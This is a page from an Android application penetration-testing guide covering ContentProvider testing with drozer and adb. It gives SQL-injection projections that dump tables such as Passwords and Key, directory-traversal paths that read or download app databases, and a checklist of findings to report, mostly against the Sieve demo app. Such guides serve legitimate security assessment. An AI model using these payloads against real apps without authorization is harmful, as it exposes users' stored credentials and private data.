[A]ndroid [A]pplication [P]entest [G]uide
  • AAPG
  • 1. MANUAL STATIC ANALYSIS
    • 1.1 Decompile APK
    • 1.2 Check certificate
    • 1.3 Analyze AndroidManifest.xml
    • 1.4 Source Code Analysis
  • 2. AUTOMATED STATIC ANALYSIS
  • 3. MANUAL DYNAMIC ANALYSIS
    • 3.1 Install application & use it
    • 3.2 Bypass detections
    • 3.3 Analyze local storage
    • 3.4 Attack surface
      • 3.4.1 Activities
      • 3.4.2 ContentProvider
      • 3.4.3 Services
    • 3.5 Log analysis
    • 3.6 More HOW and WHAT! (still work in progress)
  • 4. APK TAMPERING
    • 4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)
    • 4.2 Quick Proof-of-Concept (Meterpreter)
Powered by GitBook
On this page
  • DROZER
  • SQLi
  • FILESYSTEM-CP
  • ADB
  • THINGS TO REPORT

Was this helpful?

  1. 3. MANUAL DYNAMIC ANALYSIS
  2. 3.4 Attack surface

3.4.2 ContentProvider

DROZER

Info:

run app.provider.info -a com.x.x.x

Path guessing & determining accessible content:

run scanner.provider.finduris -a com.x.x.x

Use URIs from above or guess yourself: (in addition: .insert / .update / .delete)

run app.provider.query content://<URI> --vertical

Test content providers for SQL-Injection:

run scanner.provider.injection -a com.x.x.x

Find tables accessible through SQL-Injection:

run scanner.provider.sqltables -a com.x.x.x

SQLi

list all db tables

run app.provider.query content://com.x.x.x.ProviderName/path/ --prjection "* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "'" unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords
run app.provider.query content://com.x.x.x.ProviderName/path/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

Example - retrieve data from otherwise protected tables:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

FILESYSTEM-CP

Download db:

run app.provider.download content://com.x.x.x.ProviderName/../../../../../../../../data/data/com.x.x.x/database.db /home/user/database.db

Find content provider that are susceptible to directory-traversal:

run scanner.provider.traversal -a com.x.x.x
run app.provider.read content://com.x.x.x.ProviderName/path/to/file

Example (/etc/hosts is world-readable -> no biggy)

run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

or

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

ADB

adb shell content query --uri content:/com.x.x.x.ProviderName/file_or_path

THINGS TO REPORT

  • Inproper use of permissions (no path permissions, no READ/WRITE permissions)

  • If SQL Injection is possible

    • If weak hash-function was used (like MD5) on passwords or other sensitive data

  • Accessed db-files

Previous3.4.1 ActivitiesNext3.4.3 Services

Last updated 5 years ago

Was this helpful?